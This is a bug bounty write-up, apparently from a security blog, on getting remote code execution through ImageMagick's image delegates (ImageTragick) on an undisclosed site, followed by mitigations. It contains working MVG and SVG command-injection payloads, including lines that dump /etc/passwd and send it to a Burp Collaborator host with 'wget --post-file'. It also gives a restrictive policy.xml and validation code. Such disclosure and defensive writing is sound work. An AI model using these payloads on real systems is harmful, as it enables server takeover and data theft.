Abusing ImageMagick to obtain RCE

Bug Bounty

Remote Code Execution from an image source? Is it possible? Yes, definitely. In this blog post, a Strynx team member describes a variation of Remote Code Execution (RCE) through ImageMagick which earned him a generous bounty of $5000. Interestingly, a few tweaks inside the image source were enough to exfiltrate data over DNS (an out-of-band, side-channel technique). Let’s see how it was done, after a short introduction to ImageMagick.

What is ImageMagick? ImageMagick is a free and open-source software suite for displaying, converting, and editing raster and vector image files. It can read and write over 200 image file formats. Surprisingly, ImageMagick is used by many Fortune 500 companies. It is very popular, and plugins make it easy to use from PHP, Ruby, Node.js and other languages, so it is common for websites to use it for image resizing or cropping.

#Protip: If a website takes your photo and crops it into an avatar, there is a good chance the website is using ImageMagick to do that.

Coming to the vulnerabilities. Is it secure by default? No, you have to take steps to secure it yourself. In 2016, researchers discovered that it was possible to execute arbitrary code (CVE-2016-3714) by hiding it inside image files that a user uploads. That means an attacker can make a web server do their bidding by uploading an image containing code of the attacker’s choosing. This is all documented at https://imagetragick.com/, which covers these vulnerabilities and how to mitigate them.

Vulnerabilities in Image Decoder:

ImageMagick allows processing files with external libraries. This feature is called a ‘delegate’. It is implemented as a system() call with a command string (‘command’) taken from the config file delegates.xml, with the actual values substituted for the different params (input/output filenames etc.). Due to insufficient filtering of the %M param, it is possible to conduct shell command injection. The most dangerous part is that ImageMagick supports several formats, such as SVG and MVG, which allow including external files from any supported protocol, including delegates. As a result, any service which uses ImageMagick to process user-supplied images with the default delegates.xml / policy.xml may be vulnerable to this issue. Some common exploits (in each, the injected shell command is the part following the `|`):

exploit.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

exploit.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

In this case study we will use the MVG exploit, which is interpreted by the server and, when decoded, causes code to execute.

Abusing ImageMagick library to get Remote Code Execution

The program mentioned in this blog post is a private program, so the site is represented as example.com, as disclosure is not allowed.

By inspecting a static image file served by the application, it was observed that ImageMagick was possibly being used. The image file contained certain keywords which pointed to this conclusion. The URL was as follows: https://subdomain.example.com/directory/5b9682b23bb………:avatar?a44c0de5…..c54b5&x6xx9jul3=1

After analysing the source of the image file, an interesting string, “tEXtdate:modify”, was found in it. This indicated that the server converted pictures with ImageMagick/GraphicsMagick but did not add the -strip command line option. The converted image therefore still contained the plaintext tEXt chunk date:create.

Along with this, a tEXtdate:modify chunk and timestamps are usually included in such PNG files.
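As an added example (not code from the original post), a small PNG chunk walker a defender can run against their own served avatars to see whether the unstripped ImageMagick/GraphicsMagick tEXt metadata described above (date:create, date:modify) is leaking. The two sample PNGs are constructed inline and contain no image data.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_text_chunks(data: bytes) -> list:
    """Walk the PNG chunk stream and return (keyword, text) pairs from tEXt chunks."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, found = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if ctype == b"tEXt":  # layout: keyword NUL text, both Latin-1 per the PNG spec
            keyword, _, text = body.partition(b"\x00")
            found.append((keyword.decode("latin-1"), text.decode("latin-1")))
        if ctype == b"IEND":
            break
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
    return found


def leaks_converter_fingerprint(data: bytes) -> bool:
    """True if the image still carries the date:create / date:modify chunks that
    ImageMagick and GraphicsMagick write unless the output is stripped."""
    return any(k in ("date:create", "date:modify") for k, _ in png_text_chunks(data))


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk with its CRC (used only to construct the sample files)."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed minimal 1x1 PNGs (no IDAT): one as an unstripped converter would
# emit it, and one with the metadata stripped.
_IHDR = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
UNSTRIPPED_PNG = (PNG_SIG + _IHDR
                  + _chunk(b"tEXt", b"date:modify\x002020-01-01T00:00:00+00:00")
                  + _chunk(b"IEND", b""))
STRIPPED_PNG = PNG_SIG + _IHDR + _chunk(b"IEND", b"")

if __name__ == "__main__":
    print(png_text_chunks(UNSTRIPPED_PNG), leaks_converter_fingerprint(UNSTRIPPED_PNG))
    print(png_text_chunks(STRIPPED_PNG), leaks_converter_fingerprint(STRIPPED_PNG))
```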

With this information in hand, it was time to exploit the issue. The exploits shown above were modified to test time-based payloads. Here is the sample code used:

push graphic-context
viewbox 0 0 200 200
fill 'url(https://example.org/vfqBnrslJIi/";sleep "6.0)'
pop graphic-context

The payload was converted to base64 because the parameter carrying it (d64) indicated that the server was base64-decoding the request. The newly generated payload for the parameter d64:

cHVzaCBncmFwaGljLWNvbnRleHQKdmlld2JveCAwIDAgMjAwIDIwMApmaWxsICd1cmwoaHR0cHM6Ly9leGFtcGxlLm9yZy92ZnFCbnJzbEpJaS8iO3NsZWVwICI2LjApJwpwb3AgZ3JhcGhpYy1jb250ZXh0

The payload was base64-decoded by the server and the response was delayed by 6.0 seconds, confirming the attack.

It was time to exploit further. Direct read access was not available, so Burp Collaborator was used to obtain the results of the executed commands. The payload was modified to store the output of a command in a text file and then send that file to our Burp Collaborator instance using wget --post-file.

First, the user the application runs as was checked using whoami. The payload was generated as follows:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|whoami>>/tmp/pwned.txt")'
pop graphic-context

The result of the command was stored in pwned.txt, and the file was then read via Burp Collaborator as follows:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|wget --post-file /tmp/pwned.txt XXX.burpcollaborator.net")'
pop graphic-context

A request was observed in Burp Collaborator whose body contained the user the application runs as.

To fully demonstrate the impact, a PoC was generated to read the contents of /etc/passwd. Using the same steps, the two payloads were as follows:

  1. Saving output to pwned.txt

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|cat /etc/passwd >>/tmp/pwned.txt")'
pop graphic-context

  2. Reading the file using our collaborator

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|wget --post-file /tmp/pwned.txt XXX.burpcollaborator.net")'
pop graphic-context

As seen in the screenshot, the contents of /etc/passwd on the server were read, confirming the issue.

The issue was reported to the company’s vulnerability disclosure program using the appropriate channels. The vulnerability was confirmed within hours of reporting and the fix was deployed as soon as possible. A bounty of $5000 was awarded for this issue.

If your website uses the ImageMagick library, make sure you mitigate this with the appropriate steps shown below:

  • Verify that all image files begin with the expected “magic bytes” corresponding to the image file types you support before sending them to ImageMagick for processing. (See the ImageTragick FAQ for more info.)
  • Use a policy file to disable the vulnerable ImageMagick coders. The global policy for ImageMagick is usually found in “/etc/ImageMagick”. The policy.xml example below disables the coders EPHEMERAL, URL, MVG and MSL (and, as listed, HTTPS, TEXT, SHOW, WIN and PLT).

policy.xml file:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
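As an added example (not code from the original post), the magic-bytes check from the first mitigation, applied before an upload ever reaches ImageMagick. It also pins the coder with ImageMagick’s `format:path` prefix and adds -strip, so neither content sniffing nor the metadata leak described earlier comes into play. The allowed types, paths and resize size are assumptions, and the two upload samples are constructed inline.

```python
# Content signatures ("magic bytes") for the upload types this service accepts.
ALLOWED_MAGIC = {
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
}


def sniff_image_type(data: bytes):
    """Return 'png', 'jpeg' or 'gif' from the file header, or None for anything else.
    MVG and SVG are plain text, so they never match and are rejected here."""
    for kind, sigs in ALLOWED_MAGIC.items():
        if any(data.startswith(sig) for sig in sigs):
            return kind
    return None


def convert_argv(upload_path: str, data: bytes, declared_ext: str, out_path: str) -> list:
    """Build the ImageMagick command for a validated upload, or raise ValueError.
    The input coder is pinned with the 'png:' style prefix so ImageMagick uses the
    verified format instead of guessing it from the file's content, and -strip
    removes the tEXt date:create / date:modify metadata from the output."""
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("upload is not a supported raster image")
    ext = declared_ext.lower().lstrip(".")
    if ext == "jpg":
        ext = "jpeg"
    if ext != kind:
        raise ValueError(f"declared type {ext} does not match content {kind}")
    return ["convert", f"{kind}:{upload_path}", "-strip", "-resize", "128x128",
            f"png:{out_path}"]


# Constructed inputs: a PNG header followed by filler, and the text MVG skeleton
# from the post uploaded under a .png name (without the check, ImageMagick would
# sniff the content and select the MVG coder regardless of the extension).
PNG_UPLOAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MVG_UPLOAD = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"

if __name__ == "__main__":
    print(convert_argv("/tmp/upload", PNG_UPLOAD, "png", "/tmp/avatar.png"))
    try:
        convert_argv("/tmp/upload", MVG_UPLOAD, "png", "/tmp/avatar.png")
    except ValueError as err:
        print("rejected:", err)
```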

That’s all for this blog. Hope you liked it. Stay tuned for upcoming posts. Please subscribe to the blog if you haven’t done yet to never miss any blogs published to the site. Have a nice day!
